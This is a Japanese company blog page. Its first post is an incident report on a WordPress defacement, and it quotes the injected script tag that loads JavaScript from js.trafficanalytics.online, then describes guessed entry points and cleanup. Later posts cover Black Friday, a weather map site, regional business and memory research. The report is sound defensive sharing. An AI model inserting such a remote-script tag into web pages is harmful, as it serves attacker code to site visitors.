2017.01.31 (Tue) Category : Blog Author :

サイト改ざん案件(報告)

最近サイト改ざんの対応案件が立て続けに入ったため、同じ被害に合わないために情報共有をします。

今回見つけたのは、以下のスクリプトをscriptタグで自動実行させるプログラムです。

wordpressのとあるページに埋め込まれていました。

”js.trafficanalytics.online/js/js.js”

 

侵入手口から推測すると

  1. wordpressのアカウント奪取
  2. FTPアカウント奪取
  3. DBアカウント奪取
  4. SSHアカウント奪取
  5. ミドルウェアのセキュリティホールをつく

これらのうちどこかのアカウント、セキュリティホールを利用してログイン、もしくはスクリプトを実行しているのではないかと思われます。

 

症状

wordpressのとあるページに

<script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>

というコードが埋め込まれます。
同じコードが同じ場所に連続で埋め込まれていました。

連続で埋め込まれている(規則性がある)というところを見るとなんらかのプログラムされたものによって書き込まれていることが推測されます。
人為的な改ざんではないと考えられます。

さらに、wordpressでは、ログインページからログインし、記事やページを編集した場合はリビジョンを付けて世代管理されます。
世代管理されている状態をみるとその内容は3年前に変更されたということになっていました。

まずは、前の正しい状態に戻しました。

数時間後。。。

またもや改ざんされていました。
今度は、過去のリビジョンもすべて改ざん対象となっていました。
しかも日付は変更されていません。

このことから、直接DBに書き込んだことがわかります。

ということで、DBにログインしてユーザ情報を見てみたところ
すべてのユーザがパスワード無しでアクセスできる状態となっていました。

この設定をちゃんとし、
もちろん既存のユーザはすべて削除し、新規に追加。

パスワード設定しなおしました。

ここで解決ではありません。

どうやってDBにユーザを作成したのか。
そこが問題です。

ということは、
ミドルウェアのセキュリティホールが怪しい。

さらに、apacheのerror.logが参照できたので覗いてみるとmod_wsgiに対してかなりの数の攻撃がありました。おおよそここが原因ではないかと考えます。
普通にapache運用しているとmod_swgiなんて入れないんですがどうやらそこのレンタルサーバーやさんのコントロールパネルがphthonで動作するらしくそのために入っているっぽいです(推測)

とりあえずなんとなく原因がわかったのですが、
また攻撃されるかもしれません。

できる対応とすれば、残りは、FTPのパスワード変更です。
SSHもあればパスワード変更。

それでも改ざんされるようであれば、セキュリティホールを突かれているとしか考えられないので、おおよそmod_wsgiであ廊下と思います。
こうなればサーバー事業者に相談するしか方法はありません。

調査依頼ありましたら、ご相談に応じます。


2016.11.24 (Thu) Category : Blog Author :

BLACK FRIDAYブームの予感

BLACK FRIDAY

なんかここ最近みかけるようになった「ブラックフライデー」。違和感がありすぎる。2月の恵方巻きはまだ日本の文化を日本中に広めたのはよいとして、これは何?と思って調べてみました。

続きを読む »

2016.08.30 (Tue) Category : Blog,website Author :

気圧、風の流れ、雨が心地よく表現されるサイト

「Windyty」(読み方はわかりません。。。)というサイトがありました。
https://www.windyty.com/
windyty

埋め込み用タグも作ってくれます。
地球全体も見ることができます。
なんといっても、動きが早いです。きもちいい。
台風が来てる時に見るとすごさが倍増します。

波・風予測 Waveシミュレーター波・風予測 Waveシミュレーター

波情報サイト「BCM」でおなじみの波予測ツール、『Waveシミュレーター』の無料アプリが大幅にリニューアルして復活しました。

『Waveシミュレーター』は、全世界(全球)の波高、波向、風向をアニメーションでご覧頂くことが可能です。また、全球から各海域へのズームアップも可能です。

日本近海域では、…

2016.08.26 (Fri) Category : Blog Author :

地方でビジネスを興すことのプラス面

「東京 ビジネス」東京はマーケットが広いため効率的に顧客が存在する(人口密度が高い)。そのため、ビジネス展開も早く進む。
だが、地方ではマーケットが薄い(狭い)ため、効率的に進めない。

 

 

 

効率的ではない地方でビジネスがうまくいけば、東京に持ってきたときに展開が早くなる。
ビジネスを展開するうえで、地方から始めることの最大のプラス面はそこである。
地方で成功すれば、人口密度の高い東京に持ってきたとき成功しやすい。
また、海外展開も視野に入れやすい。

成功事例としては、
ファーストリテイリング(ユニクロ)が山口県から始めたことがあげられる。

逆に、東京で成功したものを地方へ展開しようとしてもマーケットが狭いため思うようにいかない。うまくいかないケースは多々あるようだ。
 

2016.07.26 (Tue) Category : Blog Author :

脳科学における記憶のメカニズム

記憶のメカニズムについて、日経トレンディの7月号に面白い記事があったので要約しました。

 

記憶のメカニズム

情報は「脳の前頭前野」(ワーキングメモリ)に一時的に保持される。

脳が覚えるべき重要な情報と認識した場合、脳の奥にある大脳辺縁系「海馬」に記憶される。

海馬に入れられた情報はしばらく使わないと捨てられる。

人に話す、書き留めるといったアウトプットを行うと「大脳新皮質」に記録され、長期の記憶になる。

※アウトプットすることが重要。

アウトプットしようとすることで思い出す。思い出す行為が記憶の定着に繋がる。

1時間後に56%忘れる
1週間後に77%忘れる

※エビングの忘却曲線

エビングハウスの忘却曲線

エビングハウスの忘却曲線


続きを読む »

1 2 3 4 5 6 62
%d人のブロガーが「いいね」をつけました。